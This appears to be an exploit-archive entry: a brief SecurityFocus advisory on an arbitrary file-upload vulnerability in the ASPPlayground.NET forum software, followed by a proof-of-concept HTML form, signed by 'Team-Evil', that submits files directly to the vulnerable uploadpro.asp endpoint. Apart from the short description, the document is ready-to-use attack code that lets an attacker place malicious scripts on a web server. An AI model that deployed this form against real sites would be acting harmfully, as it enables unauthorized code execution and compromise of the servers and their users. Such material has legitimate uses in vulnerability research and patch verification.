64 lines
No EOL
1.3 KiB
Text
64 lines
No EOL
1.3 KiB
Text
source: https://www.securityfocus.com/bid/14070/info
|
|
|
|
ASPPlayground.NET is prone to a remote arbitrary file-upload vulnerability.
|
|
|
|
Exploiting this issue may allow remote attackers to upload arbitrary files including malicious scripts and possibly execute the scripts the affected server.
|
|
|
|
This issue can ultimately help attackers gain unauthorized access in the context of the webserver.
|
|
|
|
http://www.example.com/forum/uploadpro.asp?memori=&deletefile=&mode=
|
|
|
|
refer to
|
|
|
|
http://www.example.com/forum/post.asp
|
|
|
|
*
|
|
|
|
ASP Playground html bug :
|
|
___________________________
|
|
|
|
<html>
|
|
<head>
|
|
<title>ASP Playground Version beta 3.2 SR1 upload Arbitrary Files
|
|
</title>
|
|
|
|
</table>
|
|
<br>
|
|
<table width="98%" border="0" cellspacing="0" cellpadding="0">
|
|
|
|
<form method="POST" action="http://www.example.com/forum/uploadpro.asp?
|
|
|
|
memori=&deletefile=&mode=" enctype="multipart/form-data"
|
|
|
|
onSubmit="return respondToUploader(this)">
|
|
<tr>
|
|
<td bgcolor="8d5a18">
|
|
<table width="100%" border="0" cellspacing="1"
|
|
|
|
cellpadding="4">
|
|
<tr>
|
|
<td bgcolor="f8fff3">
|
|
upload<br>
|
|
<input type="file" name="File1" size="22">
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
</td>
|
|
</tr>
|
|
<tr>
|
|
<td>
|
|
<hr size="1" noshade>
|
|
</td>
|
|
</tr>
|
|
<tr>
|
|
<td align="right">
|
|
<input type="submit" name="submit" value="upload">
|
|
|
|
</td>
|
|
</tr>
|
|
</form>
|
|
|
|
</table>
|
|
</body>
|
|
<center><b>pOWERED By Team-Evil l8oo8l@gmail.com
|
|
</html> |